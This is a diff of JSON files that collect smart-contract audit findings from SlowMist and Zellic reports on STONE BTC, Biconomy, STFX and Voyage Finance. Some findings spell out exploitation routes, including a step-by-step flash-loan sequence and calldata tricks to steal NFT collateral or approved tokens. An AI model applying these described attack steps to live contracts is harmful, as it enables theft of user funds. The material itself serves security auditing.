"https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, users can deposit funds through the deposit/depositMultiple functions. The contract directly transfers the user-specied amount of wrapped BTC tokens using the safeTransferFrom function. It is important to note that the contract is not compatible with fee-on-transfer wrapped BTC tokens. Similarly, when users make deposits or withdrawals, the contract performs decimal conversion using 18- tokenDecimals[_token] . This renders the contract incompatible with any wrapped BTC tokens that have a decimal greater than 18. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Suggestion" + ] + }, + { + "title": "Potential risk of not being able to collect fees", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, users are charged a certain fee when making deposits or withdrawals. The fee amount is determined by amount * feeRate / FEE_BASE . Due to Solidity's division operation truncating the decimal part, if the user's deposit or withdrawal amount is relatively small, the calculated fee will be 0. This prevents the contract from collecting deposit/withdrawal fees. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Low" + ] + }, + { + "title": "Unnecessary unchecked", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, all the for loop functionalities use unchecked for incrementing i to reduce gas consumption. However, the contract's Solidity compilation uses ^0.8.26 , and Solidity introduced the unchecked loop increments feature in version 0.8.22, making the use of unchecked unnecessary. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Gas Optimization Audit", + "Severity: Suggestion" + ] + }, + { + "title": "Risk of DoS when removing supported tokens", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, privileged roles can add/remove supported wrapped BTC tokens through the addSupportedTokens/removeSupportedTokens functions. When performing the removeSupportedTokens operation, the contract checks that the balance of the token being removed must be zero. This can be easily exploited, as users can donate a small amount of tokens to prevent the removeSupportedTokens function from working properly. It is also important to note that when users withdraw, the contract converts the decimal to the decimal of the token being withdrawn. When the decimal of this token is smaller than the decimal of STONE BTC, there will always be a small amount of dust tokens left in the vault. This indirectly prevents the removeSupportedTokens function from working correctly. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Denial of Service Vulnerability", + "Severity: High" + ] + }, + { + "title": "The actual deposit amount may dier from the contract balance", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, the _checkDepositAllowed function checks the depositCapacity based on the balance of wrapped BTC tokens in the contract. Similarly, the getDepositAmounts function retrieves token balances to determine the deposit amounts. These values may dier from the actual deposit amounts made by users. Users might accidentally transfer supported tokens into the vault, or some users might send small donations to the vault. Both scenarios will cause the above two functions to obtain amounts that are greater than the users' actual deposit amounts. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Low" + ] + }, + { + "title": "Not checking if withAmount is greater than 0 when retrieving all tokens", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the Proposal contract, users can retrieve all their STONE tokens used for voting through the retrieveAllToken function. It uses a temporary variable withAmount to record the amount of STONE tokens that can be withdrawn. However, it does not check if withAmount is greater than 0 before initiating the transfer, which may result in the contract sending a 0 transfer and wasting gas. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Suggestion" + ] + }, + { + "title": "Risks of excessive privilege", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTC contract, the contract deployer is set as the DEFAULT_ADMIN_ROLE. The admin role can arbitrarily change the MINTER_ROLE/BURNER_ROLE roles, which are involved in minting and burning STONE BTC. This leads to the risk of excessive privileges. Similarly, in the StoneBTCVault and Proposal contracts, the initial DEFAULT_ADMIN_ROLE is also the deployer. Assigning sensitive permissions to an EOA address not only creates the risk of excessive privileges but also introduces a single point of failure. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Authority Control Vulnerability Audit", + "Severity: Medium" + ] } ] \ No newline at end of file diff --git a/results/zellic_findings.json b/results/zellic_findings.json index c6d6e80..1c56386 100644 --- a/results/zellic_findings.json +++ b/results/zellic_findings.json @@ -45351,6 +45351,3790 @@ "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The Secp256r1 module implements critical functionality for signature validation, and it is implemented in a nonstandard and highly optimized way. To ensure that the library works in common cases, edge cases, and invalid cases, it is crucial to have proper test coverage for these types of primitives. There are currently no tests using this library, making it hard to see if it works at all. Missing test cases could lead to critical bugs in the cryptographic primitives. These could lead to, for example, Signature forgery and total account takeover Surprising or very random gas costs Proper signatures not validating, leading to DOS Recovery of private keys in extreme cases. Google has Project Wycheproof, which includes many test vectors for common cryp- tographic libraries and their operations. A good match for this module, which uses Secp256r1 (aka NIST P-256) and 256-bit hashes, is to use the ecdsa_secp256r1_sha25 6_test.json test vectors. Do note that many of these vectors target DER decoding, so it is safe to skip tests tagged \u201cBER\u201d. Additionally, test cases where they use numbers larger than 256 bits can be ignored, as they are invalid in Solidity when using uint256 types. These test vectors can be somewhat easily converted to Solidity library tests, giving hundreds of tests for free. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" }, + { + "title": "3.4 Modexp has arbitrary gas limit", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: Medium Severity: High : Medium The Secp256r1 library makes use of the EIP-198 precompile in order to do modular exponentiation. This function is located at address 0x5 and is called near the end of the function. function modexp( uint _base, uint _exp, uint _mod ) internal view returns (uint ret) { /) bigModExp(_base, _exp, _mod); assembly { if gt(_base, _mod) { _base :) mod(_base, _mod) } /) Free memory pointer is always stored at 0x40 let freemem :) mload(0x40) mstore(freemem, 0x20) mstore(add(freemem, 0x20), 0x20) mstore(add(freemem, 0x40), 0x20) mstore(add(freemem, 0x60), _base) mstore(add(freemem, 0x80), _exp) mstore(add(freemem, 0xa0), _mod) let success :) staticcall(1500, 0x5, freemem, 0xc0, freemem, 0x20) switch success case 0 { revert(0x0, 0x0) } default { ret :) mload(freemem) } Zellic Biconomy Labs } } A gas limit of 1,500 is set for this operation. After EIP-2565, the precompile was up- dated to become more optimized and cost less gas. Before this optimization, the gas cost was sometimes very high and often overestimated. The EIP provides a function to calculate the approximate gas cost, and using the parameters from the library, we calculated it to be around 1,360 gas, which is barely within the limit. With EIP-198 pricing, the cost was significantly higher. Some chains have not yet implemented this optimization \u2014 one example being the BNB chain, which plans to implement their equivalent BEP-225 around August 30th, 2023. The standard for signature validation methods, EIP-1271, also states the following: Since there [is] no gas-limit expected for calling the isValidSignature() function, it is possible that some implementation will consume a large amount of gas. It is therefore important to not hardcode an amount of gas sent when calling this method on an external contract as it could prevent the validation of certain sig- natures. On chains without the gas optimization change for the precompile, the contract will either not work or randomly work for certain keys and signatures but not others. In the worst-case scenario, someone could be extremely lucky and manage to transfer money in but not be able to get them out again. The main risk is just the functionality of the module being broken. Provide more or the maximum amount of gas to this function call: let success :) staticcall(not(0), 0x5, freemem, 0xc0, freemem, 0x20) This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, + { + "title": "3.1 Emergency withdraw functions are missing zero address checks", + "labels": [ + "Zellic" + ], + "body": "Target: BiconomyTokenPaymaster Category: Coding Mistakes Likelihood: Low Severity: Medium : Low The withdrawERC20(), withdrawERC20Full(), withdrawMultipleERC20(), and withdrawM ultipleERC20Full() are emergency withdrawal functions that can be called by the owner to withdraw ERC20 tokens that were mistakenly sent to the Paymaster con- tract. These tokens are withdrawn to a specified target address. The emergency withdraw functions are missing zero address checks for the target address that the tokens will be withdrawn to. If the owner attempts to withdraw a substantial amount of tokens and accidentally sets target to address(0), the tokens will be lost forever. Consider adding in checks to ensure that target is not equal to address(0). This has already been done in the withdrawAllNative() function. Biconomy Labs implemented a fix for this issue in commit a88357ef2. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Paymaster data is parsed without performing a length check", + "labels": [ + "Zellic" + ], + "body": "Target: BiconomyTokenPaymaster Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The parsePaymasterAndData() function is used to parse the UserOperation structure\u2019s paymasterAndData field. The paymasterAndData field can contain data in any format, with the format being defined by the Paymaster itself. The function does not perform any length checks on the paymasterAndData field before attempting to parse it. function parsePaymasterAndData( bytes calldata paymasterAndData ) public pure returns (/) ...)) *)) { } /) [ ...)) ] (/) ...)) *)) = abi.decode( paymasterAndData[VALID_PND_OFFSET:SIGNATURE_OFFSET], (uint48, uint48, address, address, uint256, uint256) ); signature = paymasterAndData[SIGNATURE_OFFSET:]; In the above case, VALID_PND_OFFSET is 21, while SIGNATURE_OFFSET is 213. If the paymas terAndData structure does not contain at least that many bytes in it, then the function will revert. As this field is fully controllable by a user through the UserOperation structure, and the parsing is done prior to the signature check in _validatePaymasterUserOp(), this would allow a user to trigger reverts, which would cause the Entrypoint contract that\u2019s calling into _validatePaymasterUserOp() to waste gas. Zellic Biconomy Labs Consider adding a check to ensure that the paymasterAndData structure has the correct length. If it does not, consider returning an error to allow the Entrypoint contract to ignore this UserOperation and continue. Biconomy Labs implemented a fix for this issue in commit 6787a366. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Function _getTokenPrice() could return unexpected value", + "labels": [ + "Zellic" + ], + "body": "Target: ChainlinkOracleAggregator.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The _getTokenPrice() function in the ChainlinkOracleAggregator contract performs an external staticcall to fetch the price of the specified token. function _getTokenPrice( address token ) internal view returns (uint256 tokenPriceUnadjusted) { (bool success, bytes memory ret) = tokensInfo[token] .callAddress .staticcall(tokensInfo[token].callData); if (tokensInfo[token].dataSigned) { tokenPriceUnadjusted = uint256(abi.decode(ret, (int256))); } else { tokenPriceUnadjusted = abi.decode(ret, (uint256)); } } The return value success of the staticcall is not checked, which leads to the pos- sibility that when success =) false, the function return value tokenPriceUnadjusted could be zero. This could cause the caller function getTokenValueOfOneNativeToken to calculate the exchangeRate incorrectly, which would ultimately affect the result of exchangePrice. This could potentially lead to unexpected bugs in the future. Consider checking the value of success, or check the return value at the caller\u2019s side. Biconomy Labs implemented a fix for this issue in commit ca06c2a4. Zellic Biconomy Labs 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: BiconomyTokenPaymaster.sol Function: parsePaymasterAndData(byte[] paymasterAndData) This function is used to parse the paymasterAndData field of the UserOperation struct. Inputs", + "labels": [ + "Zellic" + ], + "body": "paymasterAndData \u2013 Control: Fully controlled by user. \u2013 Constraints: It must be data in a valid format, where the data from the VALID_PND_OFFSET-1 to the VALID_PND_OFFSET should represent the priceSo urce. The data from the VALID_PND_OFFSET to the SIGNATURE_OFFSET is the ABI-encoded validUntil, validAfter, feeToken, oracleAggregator, exchan geRate, and fee. Data following the SIGNATURE_OFFSET position are a valid signature. \u2013 : This is the structural data to be parsed. Branches and code coverage (including function calls) Intended branches Succeeds with parsing data properly. 4\u25a1 Test coverage Negative behavior Invalid paymasterAndData causes revert. \u25a1 Negative test Zellic Biconomy Labs Function: _postOp(PostOpMode mode, bytes calldata context, uint256 actu alGasCost) This function executes the Paymaster\u2019s payment conditions. Inputs mode \u2013 Control: Not controlled by user. \u2013 Constraints: Must be one of these: opSucceeded, opReverted, or postOpReve rted. \u2013 : Used to determine the state of the operation. context \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This contains the payment conditions signed by the Paymaster. actualGasCost \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This is the amount to be paid back to the Entrypoint. Branches and code coverage (including function calls) Intended branches Succeeds with mode opSucceeded or opReverted. 4\u25a1 Test coverage Succeeds with mode postOpReverted. 4\u25a1 Test coverage Oracle aggregator\u2019s exchange rate is used. \u25a1 Test coverage UserOp\u2019s exchange rate is used. \u25a1 Test coverage Negative behavior Failed transferFrom() leads to event being emitted. 4\u25a1 Negative test Zellic Biconomy Labs Function: _validatePaymasterUserOp(UserOperation calldata userOp, bytes 32 userOpHash, uint256 requiredPreFund) This function is used to verify that the UserOperation\u2019s Paymaster data were signed by the external signer. Inputs userOp \u2013 Control: Fully controlled by user. \u2013 Constraints: All fields are used in signature validation and thus must be valid. \u2013 : This is the UserOperation being validated. userOpHash \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This is returned as part of the context structure. requiredPreFund \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This is the required amount of prefunding for the paymaster. Branches and code coverage (including function calls) Intended branches Succeeds with valid gas limit, userOp, and requiredPrefund. 4\u25a1 Test coverage Negative behavior Invalid signature causes error to be returned. 4\u25a1 Negative test Insufficient requiredPrefund revert. \u25a1 Negative test Parsing the Paymaster data causes revert. \u25a1 Negative test", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ChainlinkOracleAggregator.sol Zellic Biconomy Labs Function: getTokenValueOfOneNativeToken(address token) This function is used to get the value of one native token in terms of the given token. Inputs", + "labels": [ + "Zellic" + ], + "body": "token \u2013 Control: Fully controlled by user. \u2013 Constraints: Should be a valid ERC20 token address. \u2013 : This is the token for which the price is to be queried. Branches and code coverage (including function calls) Intended branches Check price result of a single token. 4\u25a1 Test coverage Negative behavior Tokens with zero tokenPriceUnadjusted cause revert. \u25a1 Negative test", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Module: USDCPriceFeedPolygon.sol Function: getThePrice() This function is used to get the latest price. Branches and code coverage (including function calls) Intended branches", + "labels": [ + "Zellic" + ], + "body": "Successfully obtained the latest prices. 4\u25a1 Test coverage Zellic Biconomy Labs 5 Audit Results At the time of our audit, the audited code was not deployed to mainnet Ethereum. During our assessment on the scoped Token Paymaster contracts, we discovered three findings. No critical issues were found. Two were of low impact and the re- maining finding was informational in nature.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "3.1 ABI-encoded inputs can mismatch specified amount", + "labels": [ + "Zellic" + ], + "body": "Target: Swap.sol Category: Coding Mistakes Likelihood: Medium Severity: High : High A manager or admin can execute a swap via Uniswap\u2019s universal router. However, they can potentially cause a mismanagement of funds if they abi.encode a different value in the inputs parameter than what is specified in the amountIn parameter for the swap. The following function permits the swap: function swapUniversalRouter( address tokenIn, address tokenOut, uint160 amountIn, bytes calldata commands, bytes[] calldata inputs, ...)) ) external override onlyTrade returns (uint96) { ...)) if (deadline > 0) universalRouter.execute(commands, inputs, deadline); ...)) } As seen in this snippet, universalRouter.execute(commands, inputs, deadline) has no accordance to the amountIn parameter and thus inputs, which is supposed to en- code the amountIn, can be a different value. The protocol uses amountIn for its internal accounting and therefore can become out of sync. We recommend extracting the amountIn from the ABI-encoded inputs function param. Zellic STFX STFX acknowledged and resolved the issue in fb58bb9f Zellic STFX", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Possible denial of service in claim", + "labels": [ + "Zellic" + ], + "body": "Target: VestingFactory.sol Category: Coding Mistakes Likelihood: Low Severity: Medium : High When vestingAddresses attempt to claim, the system iterates through all addresses and sends funds accordingly. However, if the size of the vestingAddresses array be- comes too large, a denial-of-service gas error can occur, preventing anyone from being able to claim funds. The following code corresponds to the claim function: for (uint256 i = 0; i < vestingAddresses.length;) { address v = vestingAddresses[i]; if (!IVesting(v).cancelled()) { if (IVesting(v).totalClaimedAmount() < IVesting(v).amount()) { IVesting(v).claim(); } } unchecked {+)i;} } New vesting addresses can be added using the createVestingStartingFrom and cre ateVestingStartingFromNow methods. However, if the treasury calls these methods excessively, a large number of vesting addresses may accumulate, which can prevent anyone from being able to claim. Unfortunately, there is no way to remove vesting addresses once they have been added. We recommend exploring one of the following possibilities to address the issue: 1. Modify the claim function to take start and end indices, allowing users to claim their tokens in batches instead of all at once. 2. Implement a way to remove vesting addresses once they have been added to the system. This would prevent the accumulation of a large number of ad- Zellic STFX dresses that could lead to denial-of-service errors. 3. Set a maximum cap on the number of vesting addresses that can be added to the system. This would limit the potential for denial-of-service errors by preventing the system from becoming overloaded with too many vesting addresses. STFX acknowledged and resolved the issue in 6503abf8 Zellic STFX", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Protocol does not check return value of ERC20 swaps", + "labels": [ + "Zellic" + ], + "body": "Target: Swap.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The ERC20 standard requires that transfer operations return a boolean success value indicating whether the operation was successful or not. Therefore, it is important to check the return value of the transfer function before assuming that the transfer was successful. This helps ensure that the transfer was executed correctly and helps avoid potential issues with lost or mishandled funds. The protocol\u2019s internal accounting will record failed transfer operations as a success if the underlying ERC20 token does not revert on failure. We recommend implementing one of the following solutions to ensure that ERC20 transfers are handled securely: 1. Utilize OpenZeppelin\u2019s SafeERC20 transfer methods, which provide additional checks and safeguards to ensure the safe handling of ERC20 transfers. 2. Strictly whitelist ERC20 coins that do not return false on failure and revert. This will ensure that only safe and reliable ERC20 tokens are used within the protocol. In general, it is important to exercise caution when integrating third-party tokens into the protocol. Tokens with hooks and atypical behaviors of the ERC20 standard can present security vulnerabilities that may be exploited by attackers. We recommend thoroughly researching and reviewing any tokens that are considered for integration and performing a comprehensive security review of the entire system to identify and mitigate any potential vulnerabilities. STFX acknowledged and resolved the issue in 67276712 Zellic STFX", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.4 High minimum investment amount", + "labels": [ + "Zellic" + ], + "body": "Target: Spot.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium While the minimal investment permitted by the protocol is intended to establish a reasonable lower bound for investment amounts, the current restriction of 1e18 can be excessive for certain tokens, such as wBTC, particularly during a bull market when prices are high. This can make it difficult for everyday users to enter the protocol and limits the accessibility of the system. The following code sets a lower bound on the minimal investment amount: function addMinInvestmentAmount(address _token, uint96 _amount) external override onlyOwner { if (_amount < 1e18) revert ZeroAmount(); minInvestmentAmount[_token] = _amount; emit MinInvestmentAmountChanged(_token, _amount); } The current minimal investment amount of 1e18 may be too high for certain high- value coins such as wBTC, where this amount equates to approximately $30K USD and could potentially be even higher in the future. This high barrier to entry may limit accessibility for everyday users and could ultimately impact the growth and sustain- ability of the system. We recommend removing a minimal investment amount. STFX acknowledged and resolved the issue in ca4e2157 Zellic STFX", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Public pullToken function allows to steal ERC20 tokens for which Voyage has approval", + "labels": [ + "Zellic" + ], + "body": "Target: PeripheryPayments.sol Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The PeripheryPayments:)pullToken function does not perform any access control and can be used to invoke transferFrom on any token. function pullToken( IERC20 token, uint256 amount, address from, address recipient ) public payable { token.safeTransferFrom(from, recipient, amount); } Furthermore, we have two additional observations about this function: It is unnecessarily marked as payable. It allows to call transferFrom on any contract, not just ERC20; since ERC721 to- kens also have a compatible transferFrom function, pullToken could be used to invoke transferFrom on ERC721 contracts as well. At the time of this review, the Voyage contract does not hold nor is supposed to have approval for any ERC721 assets, so this issue has no impact yet. An attacker can use this function to invoke tranferFrom on any contract on behalf of Voyage, with arbitrary arguments. This can be exploited to steal any ERC20 token for which Voyage has received approval. Zellic Voyage Finance Apply strict access control to this function, allowing only calls from address(this). Voyage has applied the appropriate level of access control to this function by making it internal. Furthermore, the contract has been removed and its functionality factored into a library as reflected in commit 9a2e8f42. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Signature clash allows calls to transferReserve to steal NFT collateral", + "labels": [ + "Zellic" + ], + "body": "Target: VaultFacet.sol Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The VaultFacet contract has a transferReserve(_vault, _currency, _to, _amount) function meant to be used by the vault owner for recovering any ERC20 assets held by their vault. The function calls execute on the given vault, instructing it to call transferFrom(from , to, amount) on the address specified by the _currency argument, with the to and amount arguments specified by the transferReserve caller. An attacker can take advantage of this capability by making the vault call transferFrom on the ERC721 contract controlling a collateral held by the vault. This is possible since ERC20 transferFrom and ERC721 transferFrom signatures are identical; therefore, the calldata format required by both functions is the same. An attacker can transfer any NFT held by a vault without having fully repaid the debt for which the NFT was held as collateral. Ensure the contract being called is not the contract of an NFT being held as collateral. An additional recommended hardening measure would be to entirely deny calls to ERC721 contracts. A possible approach to accomplish this is to try to call a harmless ERC721 method on the contract and reverting the transaction if the call does not fail. Commit 7460dc9a was indicated as containing the remediation. The commit appears to correctly fix the issue. The transferReserve function has been renamed to transf erCurrency and now takes as input the address of an NFT collection. The currency to be transferred is obtained from the metadata associated to the collection in Voyage storage. Voyage updated the code in a subsequent commit, and (as of commit f558e630) the t Zellic Voyage Finance ransferCurrency function again receives a _currency argument representing an ERC20 contract address. The change was made to ensure users can always withdraw ERC20 tokens that would otherwise be at risk of being stuck in their vault. That address is checked against data contained in Voyage storage to ensure it is not the address of an ERC721 contract used by Voyage, and the code seems still safe. We note that 25 commits exist between 7460dc9a and the one subject to our au- dit, applying changes that are both irrelevant as well as others potentially relevant to the remediation, increasing the difficulty of the review. In total, the diff between the reviewed and remediation commits amounts to 18 solidity files changed, with 137 in- sertions and 385 deletions. The changes include adding a checkCurrencyAddr function also used in transferCurrency, then renamed to checkCollectionAddr, which only en- sures that the address given as an argument is a deployed contract, not that it exists in the metadata stored by Voyage as the name could imply. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing calldata validation in buyNow results in stolen NFT", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: Critical : Critical The _data calldata parameter passed to buyNow(...))) requires a consistency check against the _tokenId parameter. The _tokenId passed is recorded in LibAppStorage.ds().nftIndex[param.collection][ param.tokenId ] = composeNFTInfo(param); where nftInfo.isCollateral is set to true by composeNFTInfo(...))). However, the actual NFT ordered from the market is specified in _data, which is not validated to match the given _tokenId. This allows an attacker to purchase a mis- matching NFT, which is sent to the vault. The NFT corresponding to the _tokenId argument is marked as collateral for the loan instead of the one that was actually re- ceived. Therefore, the token can be withdrawn from the vault, as the following check in VaultFacet:)withdrawNFT(...))) will not revert the transaction: if (LibAppStorage.ds().nftIndex[_collection][_tokenId].isCollateral) { revert InvalidWithdrawal(); } This vector makes the current implementation vulnerable to several attacks. For ex- ample, buyNow can be called with tokenId = 10 and calldata _data containing tokenId = 15. The order will process and an NFT with tokenId = 15 will be purchased. The NFT can then be withdrawn while having only paid the down payment. Validation checks should be added to ensure that the tokenId and collection passed in are consistent with the tokenId and collection passed in calldata _data. Addi- Zellic Voyage Finance tionally, validation modules should be added to the LooksRareAdapter and SeaportAd apter to validate all other order parameters. Currently, only the order selectors are validated. This additional lack of checks opens up the possibility for more missing validation exploits on other variables. However, the core of the vulnerability is the same, and so we have grouped them all into one finding. Voyage has incoporated the necessary validation checks for tokenId and collection in commit 7937b13a. They have also included additional validation checks for isOrderAsk and taker in LooksRareAdapter and fulfillerConduitKey in SeaportAdapter in commit 7937b13a. These are critical validations checks to have included and we applaud Voy- age for their efforts. However, there may still be other parameters that require valida- tion checks in the orders and we suggest Voyage perform a comprehensive review of all of the parameters in determine if there are any outstanding validation checks that may be necessary. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Missing timelocks can result in stolen NFTs", + "labels": [ + "Zellic" + ], + "body": "Target: VToken.sol Category: Business Logic Likelihood: High Severity: Critical : Critical To start, there are no timelocks on the senior and junior depositor vaults. Furthermore, the share of vault assets lenders are entitled to when they withdraw is based on the share of assets at the time of deposit: function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; } And these funds are held in bonding until they are claimed: function claim() external { uint256 maxClaimable = unbondings[msg.sender].maxUnderlying; [...))] This means a malicious user can potentially steal an outsized share of the principal and interest payments by manipulating their vault shares through deposits, withdraws, and claims. Given that a lender can also purchase an NFT, the above opens up a novel approach for NFT theft as follows: 1. Take out a flash loan. 2. Call deposit(...))) - make a large vault deposit and get awarded an outsized number of shares (shares are proportional to total asset share). 3. Call buyNFT(...))) - purchase an NFT by making the first principal and interest payments. Zellic Voyage Finance 4. Call withDraw(...))) - with a large enough flash loan, you should be able to lock for withdraw the majority of the principal and interest payments you just made. 5. Call claim(...))) - remove your funds from the vault and pay back your flash loan. You will need a separate source of funds to pay interest on the flash loan (longer-term loan, whale). 6. Repeat steps 2, 4, and 5 until the maturity of the loan has passed. 7. Call withdrawNFT(...))) to take posession of your NFT. Sell it and repay any out- standing debts. The vector above can be blocked by preventing lenders from also purchasing NFTs; however, this would be a naive fix. The ability to deposit and withdraw funds without timelocks in order to create a maxClaimable slip that can be used to claim interest and principal payments at any time is a fundamental design flaw. It means depositors can game the system, claiming principal and interest payments for which they hold no credit risk. We suggest implementing a timelock mechanism on depositors\u2019 shares to ensure they are \u201cpaying their dues.\u201d This will help ensure depositors take on levels of credit risk commensurate with their returns. It is true that depositors who come in at later dates may end up covering losses on assets lent out earlier; our interpretation is that this is part of the pooling design. However, we feel the ability to game this exposure is a design flaw and should be removed. Commit a5bfd675 was indicated as containing the remediation. Rewiewing the reme- diation for this issue has proven to be challenging due to the pace of the development. A total of 181 commits exist between the commit under review and a5bfd675; the diff between the two commits amounts to 43 solidity files changed, with 2416 insertions and 1684 deletions. The issue appears to be correctly fixed at the given commit. We largely based this evaluation on the description provided by the Voyage team due to the considerable amount of changes, which aligns with what can be observed in the commits. In particular, the code tracking the balances of the amounts deposited by the users has been updated to keep track of the unbonding amounts; further, we ob- served no anomalies in the evolution of the balances during the execution of a proof of concept developed to demonstrate the issue when executed against the commit containing the remediation. We note that it is still technically possible to reclaim a disproportionate amount of the interests portion of the installments by depositing a very large amount of assets Zellic Voyage Finance before buying an NFT and withdrawing after repayments are made. The Voyage team has argued that this strategy does not seem to be exploitable to gather a profit. Their assessment is likely to be correct for the economic conditions in which Voyage is expected to operate, although profitability might be possible if some parameters such as flash loan interest rates, Voyage pool asset sizes and NFT values were to assume unexpected values. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Junior depositor funds mistakenly sent to senior depositors", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: Critical : Critical Calls to liquidate(...))) made when the discounted price of the underlying NFT is greater than the price paid when buying it will move funds from junior depositors and send them to senior depositors. In liquidate(...))), param.remaningDebt = param.totalDebt; /) [...))] param.receivedAmount = discountedFloorPriceInTotal; /) [...))] if (param.totalDebt > discountedFloorPriceInTotal) { param.remaningDebt = param.totalDebt - discountedFloorPriceInTotal; } else { uint256 refundAmount = discountedFloorPriceInTotal - param.totalDebt; IERC20(param.currency).transfer(param.vault, refundAmount); param.receivedAmount -= refundAmount; } If param.totalDebt > discountedFloorPriceInTotal, then param.receivedAmount = pa ram.totalDebt and param.remaningDebt = param.totalDebt. The following code will therefore execute the following: if (param.remaningDebt > 0) { param.totalAssetFromJuniorTranche = ERC4626( reserveData.juniorDepositTokenAddress ).totalAssets(); if (param.totalAssetFromJuniorTranche >= param.remaningDebt) { IVToken(reserveData.juniorDepositTokenAddress) .transferUnderlyingTo(address(this), param.remaningDebt); param.juniorTrancheAmount = param.remaningDebt; param.receivedAmount += param.remaningDebt; } else { Zellic Voyage Finance IVToken(reserveData.juniorDepositTokenAddress) .transferUnderlyingTo( address(this), param.totalAssetFromJuniorTranche ); param.juniorTrancheAmount = param.totalAssetFromJuniorTranche; param.receivedAmount += param.totalAssetFromJuniorTranche; param.writeDownAmount = param.remaningDebt - param.totalAssetFromJuniorTranche; } } It can be verified that param.receivedAmount = 2 * param.totalDebt or param.receive dAmount = param.totalDebt + param.totalAssetFromJuniorTranche depending on whether 